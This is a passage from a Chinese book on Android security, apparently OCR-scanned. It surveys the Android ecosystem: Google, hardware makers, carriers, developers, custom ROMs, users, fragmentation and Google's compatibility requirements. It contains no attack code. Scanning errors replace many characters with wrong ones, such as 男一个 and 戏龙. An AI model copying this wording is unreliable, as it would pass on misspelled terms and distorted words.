管理 、 品 牌 管理 、 基 础 设施 管理 、 内 部 开发 , 以 及 支持 外 部 开发 等 。 通过 与 合作 伙伴 的 紧密 合作 ， 
谷歌 创建 了 Nexus 产品 系列 , 并 且 通 过 这 种 做 法 达成 了 一 些 必要 的 商业 协议 , 进而 确保 了 一 些 重 
要 的 Android 设备 能 及 时 推 向 市 场 。 正 是 由 于 谷歌 在 所 有 这 些 事 务 上 所 表现 出 的 超 强 执行 力 ， 才 
造就 了 Android 对 消费 者 的 吸引 力 。 

首先 最 重要 的 是 ,谷歌 拥有 并 管理 Android 品牌 。 除 非 所 生产 的 设备 达到 谷歌 的 兼容 性 要 求 
(这 些 要求 的 细节 将 在 1.3.2 节 中 详细 描述 ), 否则 OEM 不 能 给 设备 贴 上 Android 品牌 , 或 者 提供 
对 Google Play 商店 的 访问 。 由 于 Android 是 开源 的 ， 所 以 对 谷歌 来 说 ， 强 制 实施 兼容 性 是 其 能 
对 其 他 利益 相关 者 产生 影响 力 的 少数 几 个 途径 之 一 。 如 果 没 有 它 ， 谷 歌 将 基本 无 力 阻 止 Android 
品牌 被 合作 伙伴 无 意 或 有 意 地 破坏 。 

谷歌 的 下 一 个 角色 则 涉及 支持 Android 设备 的 软 硬 件 基 础 设施 。 支 持 Gmail、 日 历 、 联 系 人 
及 其 他 许多 应 用 的 服务 都 是 由 谷歌 提供 的 。 此 外 ， 谷 歌 还 运营 着 Google Play 应 用 商店 ， 其 中 包 
括 以 图 书 、 杂 志 、 视 频 、 音 乐 等 各 种 形式 分 发 的 富 媒 体内 容 ， 发行 这 些 内 容 需 要 与 世界 各 地 的 发 
行 公 司 签订 授权 协议 。 此 外 ， 谷 歌 还 在 自己 的 数据 中 心 维护 着 许多 物理 服务 器 来 文 持 这 些 服务 ， 
为 AOSP 提供 许多 关键 服务 ， 比 如 托管 AOSP 源 代码 ,提供 原 厂 镜像 下 载 及 二 进 制 驱动 下 载 , 提 
供 问 题 跟 踪 服 务 器 以 及 Gerrit 代码 审查 工具 等 。 

谷歌 也 负责 监督 Android 核心 平台 的 发 展 。 在 公司 内 部 ， 和 谷歌 将 Android 项 目 视 作 一 个 全 面 
的 产品 开发 运营 部 , 在 谷歌 内 部 开发 的 软件 包括 操作 系统 内 核 、 一 组 核心 应 用 以 及 一 些 可 选 的 非 
核心 应 用 。 如 前 所 述 ， 谷 歌 一 直 在 为 未 来 的 Android 版 本 秘密 地 开发 一 些 创新 与 增强 功能 ， 谷 歌 
的 工程 师 使 用 对 设备 广 商 、 运 营 商 和 第 三 方 开发 者 不 可 见 的 内 部 开发 树 。 当 谷歌 决定 发 布 新 版 本 
时 , 它 才 同时 公布 原 广 镜像 、 源 代码 和 应 用 程序 编程 接口 (API ) 文档 , 它 也 通过 空中 下 载 (OTA ) 
分 发 渠道 推送 更 新 。 在 AOSP 发 布 之 后 , 每 个 人 都 可 以 克隆 它 , 然后 开始 在 最 新 发 布 的 版 本 上 开 

台 自 己 的 工作 , 构建 自己 的 版 本 。 这 种 隔离 开发 方式 使 开发 者 和 设备 制造 商 得 以 专注 于 一 个 版 本 ， 
而 无 需 跟踪 谷歌 内 部 团队 的 未 完成 工作 。 尽 管 有 这 个 好 处 ,但 这 种 封闭 的 开发 模式 还 是 对 AOSP 
作为 一 个 开源 项 目的 声誉 产生 了 损害 。 

谷歌 的 男 一 个 角色 是 培养 一 个 开放 性 的 基于 Android 平 台 的 开发 社区 , 谷歌 为 第 三 方 开 发 者 
提供 开发 工具 套件 、API 文 档 、 源 代码 、 编 码 风 格 指导 等 信息 。 所 有 这 些 努 力 都 有 助 于 在 大 量 第 
三 方 应 用 中 建立 有 凝聚 力 、 一 致 的 用 户 体验 。 

通过 承担 这 些 角色 ， 和 谷歌 确保 了 Android 作为 品牌 、 平 台 和 开源 项 目的 充分 活力 。 


1.2.2 ”硬件 厂商 


操作 系统 的 目标 是 管理 设备 中 所 连接 的 硬件 并 向 应 用 提供 服务 。 毕 竞 ， 如 有 果 没 有 硬件 ， 
Android 操作 系统 也 不 可 能 有 什么 用 。 现 在 的 智能 手机 的 硬件 都 是 非常 复杂 的 ， 在 如 此 小 巧 的 外 
形 要 求 和 大 量 外 设 的 情况 下 , 配置 所 需 的 硬件 是 一 项 相当 复杂 的 工程 。 为 了 更 好 地 观察 这 一 群体 
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中 的 利益 相关 者 ， 下 面 几 小 节 中 将 硬件 厂商 分 为 三 个 子 群体 ， 他 们 分 别 制造 中 央 处 理 器 ( CPU )、 
系统 芯片 (System-on-Chip ) 与 移动 设备 。 

1. CPU 制造 商 

尽管 Android 应 用 是 与 处 理 器 无 关 的 ,但 原生 二 进 制 文件 的 情况 却 并 非 这 样 。 原 生 二 进 制 文 
件 会 针对 特定 设备 所 使 用 的 特定 处 理 器 进行 编译 。Android 是 基于 Linux 内 核 的 ， 而 Linux 是 可 
移植 的 ， 并 且 还 支持 多 种 处 理 需 架 构 。 同 样 ，Android 的 原生 开发 套件 (NDK ) 所 包含 的 工具 可 
用 于 在 Android 支持 的 所 有 应 用 处 理 器 架构 上 开发 用 户 空间 原生 代码 。Android 支持 的 处 理 器 架 
构 包 括 ARM、Intel x86 和 MIPS。 

由 于 功 耗 低 ，ARM 架构 已 经 成 为 移动 设备 中 最 广泛 使 用 的 处 理 器 架构 。ARM 公司 (ARM 
Holdings ) 不 像 其 他 的 微 处 理 器 厂商 一 样 自 己 制 造 CPU ,他 们 仅 以 知识 产权 的 方式 授权 技术 .ARM 
公司 提供 了 多 种 微 处 理 器 核心 设计 ， 其 中 包括 ARM11、Cortex-A8 、Cortex-A9 和 Cortex-A15 ， 
现在 的 Android 设备 上 所 用 的 设计 通常 都 支持 ARMv7 指令 集 。 

2011 年 ,英特尔 宣布 与 谷歌 合作 , 为 Android 提供 对 英特尔 处 理 器 的 支持 。 以 Medfield 平台 
为 基础 的 Atom 处 理 需 成 为 Android 支持 的 第 一 个 英特尔 平台 。 此 外 ， 英 特 尔 启 动 了 Android on 
Intel Architecture ( Andorid-IA ) 项 目 ， 这 一 项 目 基于 AOSP， 为 英特尔 处 理 器 上 的 Android 提供 
代码 支持 。Android-IA 项 目 网 站 https://01.org/android-ia/ 是 为 系统 与 平台 开发 者 提供 的 ,而 英特尔 
Android 开发 者 网 站 http://software.intel.com/en-us/android/ 则 是 面向 应 用 开发 者 的 。 目 前 市 场 上 已 
经 有 一 些 基 于 英特尔 平台 的 智能 手机 ， 这 些 手机 中 包括 一 个 英特尔 专 有 的 二 进 制 翻译 器 ， 称 为 
libhoudini。libhoudini 能 让 ARM 处 理 需 构建 的 应 用 直接 运行 在 基于 英特尔 平台 的 设备 上 。 

MIPS 科技 公司 为 它 的 MIPS 架构 和 微 处 理 器 核心 设计 提供 授权 。2009 年 , MIPS 科技 公司 将 
谷歌 的 Android 操作 系统 移植 到 MIPS 处 理 器 架构 上 。 从 那 时 起 ， 有 几 个 设备 制造 商 已 经 启动 
了 运行 在 MIPS 处 理 器 上 的 Android 设备 项 目 ， 特 别 是 针对 机 顶 盒 、 媒 体 播放 器 和 平板 电脑 。 
MIPS 科技 提供 了 Android 移植 的 源 代码 以 及 其 他 一 些 开 发 资源 , 详 见 http://www.imgtec.com/mips/ 
developers/mips-android.asp。 

2. 系统 芯片 制造 商 

系统 芯片 (System-on-Chip ，SocC ) 指 的 是 包含 CPU 核心 、 图 形 处 理 单 元 (GPU )、 随 机 存 
取 内 存 (RAM )、 输 入 /输出 (VO ) 逻辑 单元 等 的 单个 芯片 ， 它 有 时 还 会 包含 更 多 的 处 理 吉 ， 例 
如 ,在 智能 手机 上 使 用 的 系统 芯片 很 多 都 包含 基带 处 理 器 。 目 前 ,移动 通信 行业 的 大 多 数 系统 世 
片 都 含有 一 个 以 上 的 CPU 核心 。 将 组 件 都 集中 在 单一 芯片 上 有 助 于 降低 制造 成 本 和 功 耗 ， 造 就 
更 小 更 高 效 的 设备 。 

如 前 所 述 , 基于 ARM 架构 的 设备 统治 了 Android 设备 大 家 庭 。 在 ARM 设备 中 , 主要 使 用 4 
个 主要 的 系统 芯片 家 族 : 德州 仪器 的 OMAP、 英 伟 达 的 图 窒 ( Tegra )、 三 星 的 猎户 座 ( Exynos )， 
以 及 高 通 的 戏 龙 ( Snapdragon )。 这 些 系 统 芯 片 制造 商 从 ARM 公司 获得 CPU 核心 设计 的 授权 ， 
你 可 以 从 ARM 的 官方 网 站 上 获得 其 授权 厂商 的 完整 列表 : http://www.arm.com/products/processors/ 
licensees.php。 除 了 高 通 ， 其 他 系统 芯片 制造 商都 直接 使 用 了 ARM 的 设计 而 没有 作 修 改 。 然 而 高 
通 却 付出 了 额外 的 努力 来 优化 ， 以 降低 功 耗 、 提 升 性 能 和 改善 散热 。 
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每 个 系统 芯片 都 融入 了 不 同 的 部 件 ， 因 而 需要 Linux 内 核 不 同 的 支持 。 其 结果 是 ， 需 要 在 
Git 库 中 单独 跟踪 每 个 系统 芯片 的 开发 版 本 。 每 棵 代码 树 中 都 拥有 系统 芯片 特有 的 代码 ， 包 括 驱 
动 程序 和 配置 。 有 几 次 ， 这 种 分 离 状 态 导致 安全 漏洞 被 引入 某 个 系统 芯片 特有 的 内 核 源 码 库 中 。 
这 种 状况 正 是 造成 Android 生态 圈 复 杂 性 的 关键 因素 之 一 ， 这 一 点 我 们 将 在 1.3 节 中 详细 讨论 。 

3. 设备 制造 商 

设备 制造 商 , 包括 原始 设计 提供 商 (ODM ) 和 原始 设备 制造 商 (OEM )， 他 们 设计 和 制造 供 
消费 者 使 用 的 产品 。 他 们 决定 将 哪些 硬件 和 软件 集成 到 最 后 的 设备 中 , 并 需要 照顾 到 所 有 必要 的 
整合 。 他 们 选择 要 组 合 在 一 起 的 硬件 组 件 、 设 备 外 形 尺 寸 、 屏 幕 尺 寸 、 设 备 材质 、 电 池 、 摄 像 头 、 
传感器 和 无 线 电 ( Radio ) 等 。 通 常设 备 制 造 商会 与 系统 芯片 制造 商 合作 完成 整个 产品 系列 。 大 
多 数 选择 的 依据 是 开发 具有 市 场 差异 性 的 新 设备 、 针 对 特定 客户 群 或 建立 品牌 忠诚 度 。 

在 开发 新 产品 时 ,设备 制造 商 必须 采用 能 够 在 新 硬件 上 良好 运行 的 Android 平 台 。 这 个 任务 
包括 添加 新 的 内 核 设 备 驱动 程序 、 专 有 程序 和 用 户 空间 程序 库 。 此 外 ，OEM 经 常 对 Android 进 
行 定制 修改 ， 特 别 是 在 Android 框架 层 。 为 了 遵守 Android 内 核 的 GPLv2 许可 证 ，OEM 被 迫 开 
放 内 核 源 代码 。 然 而 ，Android 框架 层 是 Apache 2.0 授权 许可 ， 它 允许 修改 仅 以 二 进 制 的 形式 发 
布 而 不 需 发 布 源 代码 。 这 也 是 绝 大 多 数 厂商 试图 通过 创新 来 让 自己 的 产品 区 别 于 其 他 产品 的 地 
方 ， 例 如，HTC 和 三 星 对 用 户 界面 (UI) 的 修改 版 本 Sense 和 Touchwiz 主要 在 Android 框架 层 
实现 。 这 些 修改 是 一 些 争议 的 焦点 , 因为 它们 导致 了 Android 生态 圈 中 一 些 复杂 的 安全 相关 问题 。 
例如 ， 定 制 引 入 了 新 的 安全 问题 ， 你 可 以 在 1.3 节 中 阅读 到 更 多 关于 这 些 复杂 性 的 讨论 。 


1.2.3 ”移动 通信 运营 商 


除了 提供 移动 语音 和 数据 服务 外 , 移动 通信 运营 商 还 和 设备 制造 商 达 成 紧密 的 合作 , 为 他 们 
的 客户 提供 附带 补贴 的 手机 。 而 从 运营 商 渠 道 得 到 的 手机 通常 带 有 运营 商定 制 的 软件 版 本 。 这些 
版 本 往往 在 开机 画面 中 有 运营 商 的 Logo， 预 配置 了 APN ( 接 入 点 名 称 ) 网 络 设置 ， 修 改 了 默认 
的 浏览 器 主页 和 浏览 器 书签 ， 并 预 装 了 大 量 应 用 。 绝 大 多 数 时 候 ， 这 些 修 改 会 被 圣人 入 系统 分 区 ， 
因而 难以 移 除 。 

除了 对 设备 固件 进行 定制 外 ， 移 动 通信 运营 商 也 有 自己 的 质量 保证 (QA ) 测试 流程 。 据 报 
道 ， 这 些 QA 流程 非常 漫长 ， 从 而 造成 软件 更 新 缓慢 。 我 们 常常 看 到 ，OEM 已 经 修补 了 它 自己 
的 非 定制 设备 中 操作 系统 的 一 个 安全 漏洞 ， 而 运营 商定 制 的 设备 中 这 一 漏洞 仍然 会 存在 很 长 时 
间 。 直 到 更 新 被 分 发 到 运营 商 设 备 时 ,这 些 合约 机 用 户 才 可 能 得 到 更 新 。 运 营 商 定制 的 设备 在 上 
市 一 段 时 间 (通常 是 12~18 个 月 ) 后 就 会 停产 。 一 些 设备 可 能 停产 得 更 快 , 极 少数 情况 下 其 至 在 
上 市 之 后 立即 停产 。 在 停产 之 后 ,仍然 使 用 这 款 设 备 的 用 户 就 不 会 再 得 到 任何 更 新 , 无 论 手机 是 
和 否 存在 安全 问题 。 


1.2.4 开发 者 
作为 一 个 开放 源码 的 操作 系统 ，Android 是 一 个 可 以 让 开发 者 自由 发 挥 的 理想 平台 。 谷 歌 的 
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工程 师 并 不 是 唯一 为 Android 平台 贡献 代码 的 人 。 有 很 多 个 人 开发 者 和 实体 以 他 们 自己 的 名 义 为 
AOSP 贡献 代码 。 向 AOSP 贡献 的 任何 代码 (无论 是 来 自 谷歌 还 是 来 自 第 三 方 ) 都 必须 使 用 相同 
的 代码 风格 ， 并 通过 谷歌 的 源 代码 审查 系统 Gerrit。 在 代码 审查 过 程 中 ， 谷 歌 公司 的 某 位 员工 会 
决定 是 否 采 纳 这 些 修改 。 

在 Android 生态 圈 中 , 并非 所 有 的 开发 者 都 为 操作 系统 本 身 构建 组 件 ， 人 数 最 多 的 一 类 开发 
者 是 应 用 开发 者 。 他 们 使 用 Android 平台 提供 的 软件 开发 工具 包 ( SDK )、 框 架 层 与 API 来 构建 
应 用 ,使 最 终 用 户 能 够 实现 自己 的 目标 ， 无论 这 些 目标 是 满足 生产 力 、 娱 乐 或 其 他 需求 。 

最 终 ， 开 发 者 是 受 应 用 的 流行 度 、 声 望 和 资金 收益 驱动 的 ，Android 生态 圈 中 的 应 用 商店 为 
开发 者 提供 了 收入 分 成 的 激励 。 例如， 广告 网 络 会 为 在 应 用 中 骨 入 的 广告 付费 。 为 了 最 大 化 自身 
收益 ， 应 用 开发 者 在 维护 声望 与 信誉 的 同时 尽量 让 自己 的 应 用 变 得 流行 ;， 有 了 一 个 良好 的 口碑 ， 
又 可 以 反 过 来 让 应 用 日 益 流 行 。 

定制 ROM 

与 制造 商 对 Android 平 台 引 入 修改 的 方法 相同 , 世界 各 地 的 爱好 者 社区 也 开发 了 一 些 定制 固 
件 (通常 被 称 为 ROM ) 项 目 。 其 中 最 流行 的 Android 定制 固件 项 目 是 CyanogenMod, 其 2013 年 12 
月 的 活跃 装机 量 达 到 了 950 万 。 它 基于 Android 的 官方 发 布 版 本 开发 ， 并 引入 了 一 些 原生 和 第 三 方 
代码 。 这 些 社区 修改 的 Android 版 本 通常 包括 性 能 优化 、 界 面 增强 、 功 能 改进 和 一 些 配置 选项 ， 而 
这 些 通常 不 会 在 随 设备 发 布 的 官方 固件 中 找到 。 遗 憾 的 是 ,这些 ROM 往往 缺少 广泛 深入 的 测试 与 
质量 保证 。 此 外 ， 与 OEM 的 情况 类 似 ， 在 定制 ROM 中 的 修改 也 可 能 会 引入 额外 的 安全 性 问题 。 

从 历史 上 看 ,设备 制造 商 和 移动 通信 运营 商 对 第 三 方 的 ROM 开发 往往 不 予 支持 。 为 了 防止 
用 户 使 用 定制 ROM, 他 们 设置 了 一 些 技术 障碍 ， 比 如 锁定 引导 加 载 程序 (boot loader ) 或 NAND 
加 锁 。 然 而 ， 定 制 ROM 已 经 变 得 更 受 欢迎 ， 因 为 它们 能 够 为 那些 不 再 获得 官方 更 新 的 老 旧 设备 
提供 持续 支持 。 正 因为 如 此 , 制造 商 和 运营 商 已 经 软化 了 对 待 非 官方 固件 的 态度 ， 随 着 时 间 的 推 
移 ， 一 些 厂商 已 经 开始 出 厂 引 导 加 载 程序 未 加 锁 或 者 可 解锁 的 设备 ， 与 Nexus 设备 类 似 。 























































































































1.2.5 用户 


如 果 没 有 庞大 的 用 户 群 支持 ，Android 就 不 会 发 展 出 如 今 繁 荣 的 社区 。 虽 然 每 个 用 户 都 有 其 
独特 的 需求 和 和 欲望， 但 是 他 们 还 是 可 以 分 成 三 类 : 一 般 消 费 者 、 高 级 用 户 和 安全 研究 人 员 。 

1. 消费 者 

由 于 Android 是 最 畅销 的 智能 手机 平台 ,终端 用 户 可 以 从 大 量 设备 中 挑选 。 消 费 者 希望 有 一 
个 多 功能 设备 ,能 够 拥有 个 人 数字 助理 ( PDA ) 功能 、 拍 照 、GPS 导航 、 上 网 、 音 乐 播放 、 电 子 
书 阅 读 等 功能 ， 以 及 一 个 完整 的 游戏 平台 。 消 费 者 通常 会 想 提 高 效率 , 保持 条 理性 ,与 生活 中 的 
人 进行 联系 , 在 外 出 时 玩 游戏 ,以 及 从 互联 网 上 获取 信息 。 在 所 有 的 这 些 需 求 之 上 ,他 们 期 望 能 
有 一 个 合理 水 平 的 安全 性 和 隐私 保护 。 
Android 的 开放 性 和 灵活 性 对 于 消费 者 也 是 显而易见 的 。 官方 渠道 可 供 选 择 的 应 用 如 此 之 多 ， 
方 渠道 以 外 来 源 的 应 用 也 不 计 其 数 , 这 都 直接 归功 于 开放 的 开发 者 社区 。 此 外 ,消费 者 还 可 以 
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安装 第 三 方 的 启动 器 、 主 屏幕 窗口 小 部 件 、 新 的 输入 法 ， 甚 至 是 全 系统 的 定制 ROM。 这 样 的 灵 
活性 和 开放 性 常常 是 消费 者 决定 从 同类 智能 手机 操作 系统 中 选择 Android 的 决定 因素 。 

2. 高 级 用 户 

第 二 类 用 户 是 一 种 特殊 类 型 的 消费 者 , 本 书 将 之 称 为 高 级 用 户 。 高 级 用 户 希 望 能 用 到 设备 现 
有 功能 之 外 的 功能 ， 比 如 ,希望 能 够 在 设备 上 启用 Wi-Fi 热点 共享 ( Wi-Fi tethering ) 的 用 户 就 属 
于 这 一 类 。 这 些 用 户 比 较 熟 悉 他 们 设备 的 高 级 设置 ， 并 知晓 设备 的 限制 。 他 们 更 容易 接受 对 
Android 操作 系统 进行 非 官方 修改 造成 的 风险 ， 包 括 运行 可 公开 下 载 的 漏洞 利用 (exploit ) 代码 
来 获取 设备 的 root 访问 权限 。 

3. 安全 研究 人 员 

你 可 以 将 安全 研究 人 员 看 作 高 级 用 户 的 一 个 子 集 , 但 他 们 有 着 额外 的 要 求 与 不 同 的 目标 。 这 
些 用 户 可 能 受 名 声 、 财 富 、 知 识 、 开 放 性 、 保护 系 统 或 以 上 某 几 种 的 组 合 所 驱动 。 无 论 动机 如 何 ， 
安全 研究 人 员 的 目标 都 是 发 现 Android 系统 中 的 未 知 安全 漏洞 。 获 得 设备 的 完全 控制 权 会 使 这 类 
研究 变 得 容易 得 多 , 因此 当 设 备 不 提供 特权 访问 时 , 研究 人 员 通 常会 首先 寻求 获得 特权 访问 的 方 
法 。 即 便 有 了 完全 访问 权限 ， 这 类 工作 仍然 是 具有 挑战 性 的 。 

实现 安全 人 研究 人 员 的 目标 需要 深厚 的 技术 知识 。 要 想 成 为 一 名 成 功 的 安全 研究 人 员 , 需要 对 
编程 语言 、 操 作 系 统 内 部 和 安全 概念 有 深刻 的 理解 。 大 多 数 安 全 研究 人 员 能 够 使 用 多 种 编程 语言 
开发 、 阅 读 与 编写 代码 。 在 某 些 意 义 上 , 这 也 让 安全 研究 人 员 成 为 了 开发 社区 成 员 。 对 他 们 而 言 ， 
花 时 间 深 入 研究 安全 概念 , 理解 操作 系统 内 部 原理 , 以 及 获取 技术 前 沿 信息 都 是 非常 普遍 的 事情 。 

安全 人 研究 人 员 的 生态 圈 群 体 是 本 书 最 主要 的 目标 读者 。 本 书 的 目标 是 为 他 们 中 的 初学 者 提供 
基础 知识 ， 也 为 已 人 门 的 研究 人 员 提 供 深 入 的 知识 。 


1.3 ”理解 生态 圈 的 复杂 性 


OHA (开放 手机 联盟 ) 几乎 溃 括 了 所 有 主要 的 Android 厂 商 , 但 其 中 一 些 群 体 却 有 着 不 同 其 
至 相互 竞争 的 目标 。 这 导致 制造 商 之 间 会 产生 各 种 各 样 的 合作 关系 , 然后 带 来 了 一 些 大 规模 的 跨 
组 织 官僚 主义 。 比 如 说 , 三 星 的 内 存 制造 部 门 是 世界 上 最 大 的 NAND 闪存 制造 商 , 大 约 占 有 40% 
的 市 场 份额 ， 却 也 为 三 星 手 机 部 门 的 竞争 对 手 生产 DRAM ( 动态 随机 存 取 存 储 器 ) 和 NAND 内 
存 。 男 一 个 争议 是 , 虽然 谷歌 没有 直接 从 Android 设备 的 销售 中 获 利 ， 但 微软 和 苹果 却 已 经 成 功 
起 诉 Android 手机 制造 商 ， 并 向 他 们 收取 专利 使 用 费 。 不 过 ， 这 仍 不 是 困扰 Android 生态 圈 的 复 
杂 性 的 全 部 。 

除了 法 律 纠纷 和 一 些 难 以 相处 的 合作 关系 ，Android 生态 圈 还 面临 着 其 他 几 个 非常 严重 的 问 
题 。 在 硬件 和 软件 中 同时 存在 的 碎片 化 造成 了 一 些 复杂 性 ,而 其 中 只 有 部 分 问题 被 谷歌 的 兼容 性 
标准 解决 了 。 对 于 所 有 的 生态 圈 利 益 相 关 者 来 说 , 更 新 Android 操作 系统 仍然 是 一 个 重大 的 挑战 。 
对 开源 代码 的 强烈 依赖 又 让 软件 更 新 问题 进一步 复杂 化 , 也 让 已 知 漏洞 的 暴露 度 变 得 更 高 。 安 全 
研究 社区 中 的 成 员 面临 着 安全 性 和 开放 性 之 间 的 选择 困境 , 而 这 种 困境 会 进一步 影响 到 其 他 的 利 
益 相 关 者 ， 导 致 了 粳 糕 的 漏洞 披露 事件 记录 。 以 下 各 将 详细 讨论 这 些 问 题 领域 。 
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1.3.1 ”碎片 化 问题 


大 量 Android 设备 设计 上 的 差异 导致 了 Android 生态 圈 的 碎片 化 问题 严重 Android 的 开放 性 
使 得 它 非常 适合 制造 商 基于 该 平台 设计 和 制造 自己 的 设备 。 结 果 是 , 设备 池 ( 即 设备 1.1 节 中 的 
“设备 家 族 ”) 是 由 许多 不 同 的 制造 商 所 制造 的 不 同 设备 所 组 成 的 , 每 个 设备 又 由 各 式 各 样 的 软 硬 
件 组 成 ， 其 中 包括 OEM 和 移动 通信 运营 商 的 修改 。 甚 至 对 于 同一 款 设备 而 言 ， 在 不 同 运营 商 或 
用 户 那里 ，Android 的 版 本 都 是 不 同 的 。 由 于 所 有 这 些 差异 ， 消 费 者 、 开 发 者 和 安全 研究 人 员 始 
终 要 面 对 并 解决 碎片 化 问题 。 

尽管 碎片 化 问题 对 消费 者 的 影响 相对 较 小 ,但 是 它 已 经 对 Android 的 品牌 造成 了 轻微 的 损害 。 
习惯 使 用 三 星 的 消费 者 如 果 改 用 HTC 的 设备 ， 经 常会 遇 到 令 人 不 快 的 体验 。 由 于 三 星 和 HTC 都 
高 度 定制 了 他 们 设备 上 的 用 户 体验 , 从 而 使 得 用 户 不 得 不 花 一 些 时 间 重 新 熟悉 他 们 的 新 设备 。 这 
种 情况 同样 也 出 现在 长 期 使 用 Nexus 设备 的 用 户 换 上 OEM 品牌 设备 时 。 随 着 时 间 的 推移 ， 消 费 
者 可 能 会 对 这 个 问题 感到 厌倦 ， 进 而 会 决定 改 用 体验 更 加 统一 的 平台 。 不 过 ,尽管 如 此 ,碎片 化 
问题 的 影响 还 是 相对 较 小 的 。 

比 起 消费 者 , 应 用 开发 者 受 碎片 化 问题 的 困扰 就 显得 更 大 了 。 问题 主要 源 于 开发 者 试图 支持 
设备 池 中 大 部 分 设备 (包括 运行 在 设备 上 的 各 种 软件 )。 对 所 有 设备 进行 测试 ， 不 仅 成 本 高 昂 而 
且 耗 时 。 虽然 模拟 器 有 所 帮助 , 但 这 并 不 能 真实 再 现 用 户 在 实际 使 用 中 遇 到 的 问题 。 开 发 者 必须 
处 理 的 问题 包括 : 不 同 的 硬件 配置 、API 级别 、 屏 幕 尺寸 以 及 外 设 可 用 性 等 。 三 星 的 Android 设 
备 共 有 超过 15 种 屏幕 尺寸 ， 从 2.6 英 寸 到 10.1 英寸 不 等 。 此 外 ，HDMI (高 保 真 多 媒体 接口 ) 软 
件 狗 和 谷歌 电视 设备 都 没有 触摸 屏 ， 因 此 需要 有 专门 的 输入 方案 和 用 户 界面 (UI) 设计 。 人 处 理 所 
有 这 些 碎片 化 问题 并 不 是 简单 的 事情 ， 所 幸 谷 歌 为 开发 者 提供 了 一 些 辅助 工具 。 

通过 尽力 隐藏 碎片 化 问题 , 开发 者 得 以 开发 出 在 某 种 程度 上 能 够 良好 地 应 用 于 不 同 设备 的 应 
用 。 为 了 应 对 不 同 的 屏幕 尺寸 ， Android 的 UI 框 架 人 允许 应 用 查询 设备 的 屏幕 尺寸 , 如 果 应 用 设计 
得 当 ， Android 还 可 以 自动 调整 应 用 的 界面 元 素 和 UI 布 局 ， 使 之 适应 这 款 设备 。Google Play 商 
店 也 人 允许 应 用 开发 者 在 应 用 中 声明 配置 要 求 ， 以 便 处 理 不 同 硬件 配置 的 问题 。 比 如 ， 当 某 一 应 用 
需要 触摸 屏 ， 而 当前 设备 又 没有 触摸 屏 时 ， 那 么 在 Google Play 商店 中 查看 这 个 应 用 时 ， 页 面 上 
就 会 显示 该 应 用 不 支持 这 款 设 备 , 并 提示 不 能 安装 。Android 应 用 支持 库 也 会 透明 地 处 理 一 些 API 
级 别 的 差异 。 然而， 尽管 拥有 如 此 多 的 可 用 资源 , 兼容 性 问题 依然 存在 。 而 这 些 极 端 问题 都 留 给 
了 开发 者 , 往往 会 让 开发 者 深 受 折磨 。 同样, 这 也 会 招致 开发 者 的 融 弃 ， 从 而 削弱 Android 生态 圈 。 

对 于 安全 性 而 言 , 碎片 化 问题 既 有 正面 又 有 负面 的 影响 , 这 主要 取决 于 你 是 从 攻击 者 还 是 防 
守 者 的 角度 来 看 待 这 个 问题 。 尽管 攻击 者 可 能 会 轻易 地 在 一 球 设备 上 找到 可 利用 的 安全 漏洞 , 但 
是 这 些 问 题 在 男 一 家 制造 商 的 设备 上 可 能 并 不 存在 。 这 使 得 攻击 者 很 难 找到 能 够 影响 生态 圈 中 大 
部 分 设备 的 安全 缺陷 。 即 便 有 人 发 现 了 这 样 一 种 安全 缺陷 ,设备 之 间 的 差异 也 让 漏洞 利用 
( exploit ) 代码 开发 变 得 极为 复杂 。 在 很 多 情况 下 , 开发 ( 对 于 所 有 设备 上 的 所 有 Android 版 本 都 
适用 的 ) 通用 漏洞 利用 代码 是 不 可 能 的 。 对 安全 研究 人 员 来 说 , 一 次 复杂 的 安全 审核 可 能 不 仅 需 
要 对 所 有 设备 进行 审查 , 还 需要 分 析 这 些 设备 的 每 一 个 软件 版 本 。 显 然 这 是 一 个 难以 完成 的 任务 。 
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如 果 专 注 于 某 一 款 设 备 ， 虽 然 更 容易 实施 攻击 ,但 不 足以 影响 到 整个 生态 圈 。 在 一 个 设备 上 存在 
的 攻击 面 ,可 能 在 另 一 设备 上 就 根本 不 存在 。 另 外 ， 有 些 组 件 更 加 难以 进行 安全 审核 ， 比 如 某 些 
设备 上 存在 的 特有 闭 源 软件 。 由 于 存在 这 些 挑战 ,碎片 化 问题 让 安全 审核 师 的 工作 更 加 困难 ， 同 
时 也 有 助 于 防止 大 规模 安全 事故 的 发 生 。 


1.3.2 兼容 性 


设备 制造 商 面 临 的 一 个 复杂 性 问题 就 是 兼容 性 。 作 为 Android 的 创始 者 ， 谷 歌 负 责 保护 
Android 品牌 。 其 中 包括 防止 碎片 化 ， 并 确保 消费 者 的 设备 符合 谷歌 的 愿景 。 为 确保 设备 制造 商 
遵守 由 谷歌 设置 的 软 硬 件 兼容 性 要 求 ,谷歌 公司 发 布 了 兼容 性 文档 和 测试 套件 。 任 何 制 造 商 要 想 
在 Android 品牌 下 制造 设备 ， 就 必须 遵循 这 些 指导 原则 。 

1. 兼容 性 定义 文档 

Android 的 兼容 性 定义 文档 (CDD ) 详 见 http://source.android.com/compatibility/， 其 中 列举 了 
Android “兼容 ”设备 的 软 硬 件 要 求 。 对 于 其 中 的 有 些 硬 件 ， 所 有 的 Android 设备 都 必须 采用 。 例 
如 ，Android 4.2 的 CDD 指定 ， 所 有 的 设备 实现 中 都 必须 包括 至 少 一 种 音频 输出 形式 ， 以 及 一 种 
或 多 种 数据 传输 速率 在 200kbit/s 或 更 高 的 网 络 连接 ， 而 具体 采用 哪些 外 设 则 由 设备 制造 商 来 决 
定 。 如 果 某 些 外 设 被 包括 在 内 ，CDD 还 指明 了 一 些 额 外 的 要 求 。 例 如 ， 如 果 设 备 制 造 商 决定 添 
加 一 个 后 置 摄像 头 ， 那 么 这 个 摄像 头 的 分 辩 率 不 得 低 于 200 万 像素 。 设 备 必 须 满足 CDD 的 要 求 
才能 戴 上 Android 这 项 “帽子 ” ， 并 要 在 出 三 前 预 装 上 谷歌 的 应 用 和 服务 。 

2. 兼容 性 测试 套件 

Android 兼容 性 测试 套件 ( CTS ) 是 一 款 自 动 化 测试 工具 ， 该 工具 从 台式 机 到 连接 的 移动 设 
备 执行 单元 测试 。CTS 测试 将 集成 到 一 种 持续 的 构建 系统 中 , 工程 师 将 用 这 种 构建 系统 来 构建 为 
谷歌 所 认证 的 Android 设备 。 它 的 目的 是 尽早 揭示 出 兼容 性 问题 ， 以 确保 软件 在 整个 开发 过 程 中 
保持 统一 的 兼容 性 。 

正如 前 面 提 到 的 那样 ，OEM 往往 会 深度 修改 Android 框架 层 的 代码 。CTS 工具 可 以 确保 指 
